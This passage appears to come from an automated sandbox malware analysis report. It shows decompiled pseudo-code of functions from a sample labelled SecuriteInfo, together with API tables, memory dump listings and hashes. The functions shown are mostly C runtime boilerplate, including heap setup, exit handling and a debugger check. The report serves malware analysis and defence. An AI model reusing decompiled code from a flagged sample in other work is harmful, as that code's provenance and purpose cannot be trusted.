								if(__eflags == 0) {
									 *_t62 = E004092FF(_t47, _t59, _t60, _t62, __eflags);
								}
							}
							__eflags =  *((intOrPtr*)(_t62 + 4)) -  *0x437168; // 0x2301610
							if(__eflags != 0) {
								_t55 =  *0x437264; // 0xfffffffe
								__eflags =  *( *((intOrPtr*)(_t62 + 8)) + 0x70) & _t55;
								if(__eflags == 0) {
									 *((intOrPtr*)(_t62 + 4)) = E00408B93(_t47, _t59, _t60, _t62, __eflags);
								}
							}
							_t41 =  *((intOrPtr*)(_t62 + 8));
							__eflags =  *(_t41 + 0x70) & 0x00000002;
							if(( *(_t41 + 0x70) & 0x00000002) == 0) {
								 *(_t41 + 0x70) =  *(_t41 + 0x70) | 0x00000002;
								 *((char*)(_t62 + 0xc)) = 1;
							}
						}
						return _t62;
					} else {
						continue;
					}
					break;
				}
			}





















                                                                                                                                                                                            0x00406048
                                                                                                                                                                                            0x00406048
                                                                                                                                                                                            0x00406048
                                                                                                                                                                                            0x0040604d
                                                                                                                                                                                            0x004062c9
                                                                                                                                                                                            0x004062dd
                                                                                                                                                                                            0x004062e0
                                                                                                                                                                                            0x004062e8
                                                                                                                                                                                            0x004062eb
                                                                                                                                                                                            0x004062eb
                                                                                                                                                                                            0x004062d3
                                                                                                                                                                                            0x004062d9
                                                                                                                                                                                            0x004062db
                                                                                                                                                                                            0x004062ec
                                                                                                                                                                                            0x004062f8
                                                                                                                                                                                            0x004062fa
                                                                                                                                                                                            0x004062fa
                                                                                                                                                                                            0x00406303
                                                                                                                                                                                            0x0040630d
                                                                                                                                                                                            0x00406312
                                                                                                                                                                                            0x00406314
                                                                                                                                                                                            0x00406317
                                                                                                                                                                                            0x00406325
                                                                                                                                                                                            0x0040632a
                                                                                                                                                                                            0x0040632d
                                                                                                                                                                                            0x00406330
                                                                                                                                                                                            0x00406333
                                                                                                                                                                                            0x00406334
                                                                                                                                                                                            0x00406336
                                                                                                                                                                                            0x0040633a
                                                                                                                                                                                            0x0040633c
                                                                                                                                                                                            0x004063a3
                                                                                                                                                                                            0x004063a5
                                                                                                                                                                                            0x004063a8
                                                                                                                                                                                            0x0040633e
                                                                                                                                                                                            0x0040633e
                                                                                                                                                                                            0x00406343
                                                                                                                                                                                            0x00406349
                                                                                                                                                                                            0x0040634e
                                                                                                                                                                                            0x00406353
                                                                                                                                                                                            0x00406359
                                                                                                                                                                                            0x0040635b
                                                                                                                                                                                            0x00406361
                                                                                                                                                                                            0x00406364
                                                                                                                                                                                            0x0040636b
                                                                                                                                                                                            0x0040636b
                                                                                                                                                                                            0x00406364
                                                                                                                                                                                            0x00406370
                                                                                                                                                                                            0x00406376
                                                                                                                                                                                            0x0040637b
                                                                                                                                                                                            0x00406381
                                                                                                                                                                                            0x00406384
                                                                                                                                                                                            0x0040638b
                                                                                                                                                                                            0x0040638b
                                                                                                                                                                                            0x00406384
                                                                                                                                                                                            0x0040638e
                                                                                                                                                                                            0x00406391
                                                                                                                                                                                            0x00406395
                                                                                                                                                                                            0x00406397
                                                                                                                                                                                            0x0040639b
                                                                                                                                                                                            0x0040639b
                                                                                                                                                                                            0x00406395
                                                                                                                                                                                            0x004063af
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004062db

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _malloc.LIBCMT ref: 004062E0
                                                                                                                                                                                              • Part of subcall function 004087E9: __FF_MSGBANNER.LIBCMT ref: 0040880C
                                                                                                                                                                                              • Part of subcall function 004087E9: __NMSG_WRITE.LIBCMT ref: 00408813
                                                                                                                                                                                              • Part of subcall function 004087E9: RtlAllocateHeap.NTDLL(00000000,004062D6,?,?,?,?,004062E5,00403150,?,00403150,00002000), ref: 00408860
                                                                                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00406303
                                                                                                                                                                                              • Part of subcall function 0040625C: std::exception::exception.LIBCMT ref: 00406268
                                                                                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 00406317
                                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00406325
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1411284514-0
                                                                                                                                                                                            • Opcode ID: 12f569891fbe40a48beb70ac1549da205e45d1c954ff3f254aca6cfceb50776d
                                                                                                                                                                                            • Instruction ID: 7efd21dea3fd4cd239c821185c704056502b46ff079096beb1513cd051b74b26
                                                                                                                                                                                            • Opcode Fuzzy Hash: 12f569891fbe40a48beb70ac1549da205e45d1c954ff3f254aca6cfceb50776d
                                                                                                                                                                                            • Instruction Fuzzy Hash: BCF0243250020867DB1436A6DD07A5A3B988F80718B2180BFE852761D2DF7DD96591CD
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00403140 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 507 403140-40317b call 406048
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00403140(char* _a4) {
				short* _v8;
				short* _v12;
				short* _t7;
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t18;

				_t7 = E00406048(_t11, _t13, _t15, _t18, 0x2000); // executed
				_v12 = _t7;
				_v8 = _v12;
				MultiByteToWideChar(0, 0, _a4, 0xffffffff, _v8, 0x1000);
				return _v8;
			}










                                                                                                                                                                                            0x0040314b
                                                                                                                                                                                            0x00403153
                                                                                                                                                                                            0x00403159
                                                                                                                                                                                            0x0040316f
                                                                                                                                                                                            0x0040317b

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00406048: _malloc.LIBCMT ref: 004062E0
                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001000), ref: 0040316F
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide_malloc
                                                                                                                                                                                            • String ID: pYhvMhvNhvIhvPdhv
                                                                                                                                                                                            • API String ID: 2241198742-3404168598
                                                                                                                                                                                            • Opcode ID: 56aee62e7bc555ec6f76082043702d313abc4c6c2cb997d691bfa4fdcdf85c25
                                                                                                                                                                                            • Instruction ID: 0150800dc66b9bf8dd20adf05b67eb7711404e09fc86a9f6919f01c061489318
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56aee62e7bc555ec6f76082043702d313abc4c6c2cb997d691bfa4fdcdf85c25
                                                                                                                                                                                            • Instruction Fuzzy Hash: DAE04FB4A44208BBEB40DF94DC46FADBBB4DB48711F2082A5FD086B3C1E5B06E508795
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00407014 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 511 407014-407025 call 406fe9 ExitProcess
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00407014(int _a4) {

				E00406FE9(_a4);
				ExitProcess(_a4);
			}



                                                                                                                                                                                            0x0040701c
                                                                                                                                                                                            0x00407025

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • ___crtCorExitProcess.LIBCMT ref: 0040701C
                                                                                                                                                                                              • Part of subcall function 00406FE9: GetModuleHandleW.KERNEL32(mscoree.dll,?,00407021,004062E5,?,0040A1F9,000000FF,0000001E,00412748,0000000C,0040A2A5,004062E5,?,?,0040EB16,00000004), ref: 00406FF3
                                                                                                                                                                                              • Part of subcall function 00406FE9: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00407003
                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00407025
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2427264223-0
                                                                                                                                                                                            • Opcode ID: 095b5baee007b83a9408aab2f7f3af13cea987fbe949e1552df6a6a63b78b475
                                                                                                                                                                                            • Instruction ID: b74e21bfa304865ff7c65d22dabd0e00423b7de14a82e07c5704903f07a00341
                                                                                                                                                                                            • Opcode Fuzzy Hash: 095b5baee007b83a9408aab2f7f3af13cea987fbe949e1552df6a6a63b78b475
                                                                                                                                                                                            • Instruction Fuzzy Hash: D1B09231004108BFCB012F12FC0AC893F2AEB803A0B118039F80919071DFB2EEE2DA98
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 004082B3 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 514 4082b3-4082d5 HeapCreate 515 4082d7-4082d8 514->515 516 4082d9-4082e2 514->516
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E004082B3(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x438074 = _t6;
				if(_t6 != 0) {
					 *0x4386b4 = 1;
					return 1;
				} else {
					return _t6;
				}
			}




                                                                                                                                                                                            0x004082c8
                                                                                                                                                                                            0x004082ce
                                                                                                                                                                                            0x004082d5
                                                                                                                                                                                            0x004082dc
                                                                                                                                                                                            0x004082e2
                                                                                                                                                                                            0x004082d8
                                                                                                                                                                                            0x004082d8
                                                                                                                                                                                            0x004082d8

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004082C8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateHeap
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 10892065-0
                                                                                                                                                                                            • Opcode ID: 55341ef2199a6d57041b111544525d909e6eb99c3809e2c0ef6ef6d8ac9252e3
                                                                                                                                                                                            • Instruction ID: 2cc335c2893408bdb1ad8c421c852a3714cbcecbc1d14b9af97d646f47ab2751
                                                                                                                                                                                            • Opcode Fuzzy Hash: 55341ef2199a6d57041b111544525d909e6eb99c3809e2c0ef6ef6d8ac9252e3
                                                                                                                                                                                            • Instruction Fuzzy Hash: A2D05E325557045EDB009F717D097623FEC9384795F00447AB94DC6190E974C680D508
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00407230 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 517 407230-40723c call 407104 519 407241-407245 517->519
                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                            			E00407230(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00407104(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}










                                                                                                                                                                                            0x00407235
                                                                                                                                                                                            0x00407237
                                                                                                                                                                                            0x00407239
                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                            0x00407245

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _doexit.LIBCMT ref: 0040723C
                                                                                                                                                                                              • Part of subcall function 00407104: __lock.LIBCMT ref: 00407112
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 00407149
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 0040715E
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 00407188
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 0040719E
                                                                                                                                                                                              • Part of subcall function 00407104: __decode_pointer.LIBCMT ref: 004071AB
                                                                                                                                                                                              • Part of subcall function 00407104: __initterm.LIBCMT ref: 004071DA
                                                                                                                                                                                              • Part of subcall function 00407104: __initterm.LIBCMT ref: 004071EA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1597249276-0
                                                                                                                                                                                            • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                            • Instruction ID: 70fb892fc6d344668bd98895bcd8e5f29677991f1c8e87daf555d93c088878c2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                            • Instruction Fuzzy Hash: FBB0927298424833DA212542AC03F0A7A0987C1B64E250061BB0C2D2E1A9A2B96180CA
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00407D88 Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 520 407d88-407d8a call 407d16 522 407d8f-407d90 520->522
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00407D88() {
				void* _t1;

				_t1 = E00407D16(0); // executed
				return _t1;
			}




                                                                                                                                                                                            0x00407d8a
                                                                                                                                                                                            0x00407d90

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 00407D8A
                                                                                                                                                                                              • Part of subcall function 00407D16: TlsGetValue.KERNEL32(00000000,?,00407D8F,00000000,0040A6BC,00437C40,00000000,00000314,?,00407437,00437C40,Microsoft Visual C++ Runtime Library,00012010), ref: 00407D28
                                                                                                                                                                                              • Part of subcall function 00407D16: TlsGetValue.KERNEL32(00000006,?,00407D8F,00000000,0040A6BC,00437C40,00000000,00000314,?,00407437,00437C40,Microsoft Visual C++ Runtime Library,00012010), ref: 00407D3F
                                                                                                                                                                                              • Part of subcall function 00407D16: RtlEncodePointer.NTDLL(00000000,?,00407D8F,00000000,0040A6BC,00437C40,00000000,00000314,?,00407437,00437C40,Microsoft Visual C++ Runtime Library,00012010), ref: 00407D7D
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2585649348-0
                                                                                                                                                                                            • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                                            • Instruction ID: a52fe3813f0f1e28e9304a3b062bf17b29fb4a8b4c47effa41d3e77be077b889
                                                                                                                                                                                            • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 00409EB4 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                            			E00409EB4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4374d0; // 0x353ea9ab
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x438380 = _t6;
				 *0x43837c = _t22;
				 *0x438378 = _t25;
				 *0x438374 = _t21;
				 *0x438370 = _t27;
				 *0x43836c = _t26;
				 *0x438398 = ss;
				 *0x43838c = cs;
				 *0x438368 = ds;
				 *0x438364 = es;
				 *0x438360 = fs;
				 *0x43835c = gs;
				asm("pushfd");
				_pop( *0x438390);
				 *0x438384 =  *_t31;
				 *0x438388 = _v0;
				 *0x438394 =  &_a4;
				 *0x4382d0 = 0x10001;
				_t11 =  *0x438388; // 0x0
				 *0x438284 = _t11;
				 *0x438278 = 0xc0000409;
				 *0x43827c = 1;
				_t12 =  *0x4374d0; // 0x353ea9ab
				_v812 = _t12;
				_t13 =  *0x4374d4; // 0xcac15654
				_v808 = _t13;
				 *0x4382c8 = IsDebuggerPresent();
				_push(1);
				E0040C590(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x411d34);
				if( *0x4382c8 == 0) {
					_push(1);
					E0040C590(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                                            0x00409eb4
                                                                                                                                                                                            0x00409eb4
                                                                                                                                                                                            0x00409eb4
                                                                                                                                                                                            0x00409eb4
                                                                                                                                                                                            0x00409eb4
                                                                                                                                                                                            0x00409eb4
                                                                                                                                                                                            0x00409eb4
                                                                                                                                                                                            0x00409eba
                                                                                                                                                                                            0x00409ebc
                                                                                                                                                                                            0x00409ebc
                                                                                                                                                                                            0x0040e360
                                                                                                                                                                                            0x0040e365
                                                                                                                                                                                            0x0040e36b
                                                                                                                                                                                            0x0040e371
                                                                                                                                                                                            0x0040e377
                                                                                                                                                                                            0x0040e37d
                                                                                                                                                                                            0x0040e383
                                                                                                                                                                                            0x0040e38a
                                                                                                                                                                                            0x0040e391
                                                                                                                                                                                            0x0040e398
                                                                                                                                                                                            0x0040e39f
                                                                                                                                                                                            0x0040e3a6
                                                                                                                                                                                            0x0040e3ad
                                                                                                                                                                                            0x0040e3ae
                                                                                                                                                                                            0x0040e3b7
                                                                                                                                                                                            0x0040e3bf
                                                                                                                                                                                            0x0040e3c7
                                                                                                                                                                                            0x0040e3d2
                                                                                                                                                                                            0x0040e3dc
                                                                                                                                                                                            0x0040e3e1
                                                                                                                                                                                            0x0040e3e6
                                                                                                                                                                                            0x0040e3f0
                                                                                                                                                                                            0x0040e3fa
                                                                                                                                                                                            0x0040e3ff
                                                                                                                                                                                            0x0040e405
                                                                                                                                                                                            0x0040e40a
                                                                                                                                                                                            0x0040e416
                                                                                                                                                                                            0x0040e41b
                                                                                                                                                                                            0x0040e41d
                                                                                                                                                                                            0x0040e425
                                                                                                                                                                                            0x0040e430
                                                                                                                                                                                            0x0040e43d
                                                                                                                                                                                            0x0040e43f
                                                                                                                                                                                            0x0040e441
                                                                                                                                                                                            0x0040e446
                                                                                                                                                                                            0x0040e45a

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0040E410
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040E425
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00411D34), ref: 0040E430
                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0040E44C
                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0040E453
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2579439406-0
                                                                                                                                                                                            • Opcode ID: 76c8bb11b8cebecf356c24081a36d3586f258a43f8f40974cbb1649574e1a985
                                                                                                                                                                                            • Instruction ID: bda269c089706b172bc3081f67be674e06a5489d715ab0107b009b998f54013c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 76c8bb11b8cebecf356c24081a36d3586f258a43f8f40974cbb1649574e1a985
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7621BEB4400308DFD740DF29F985685BBA4FB08B04F10A47EF908973A1EBB659858B0D
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406F82 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                            			E00406F82() {

				SetUnhandledExceptionFilter(E00406F40);
				return 0;
			}



                                                                                                                                                                                            0x00406f87
                                                                                                                                                                                            0x00406f8f

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00006F40), ref: 00406F87
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.319378778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.319372125.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319396499.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319411068.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319419057.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.319461502.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                            • Opcode ID: 2770ef3dcfecd0b1492965f7a63133527a082a5cc30f678bfd48e2f5a3335974
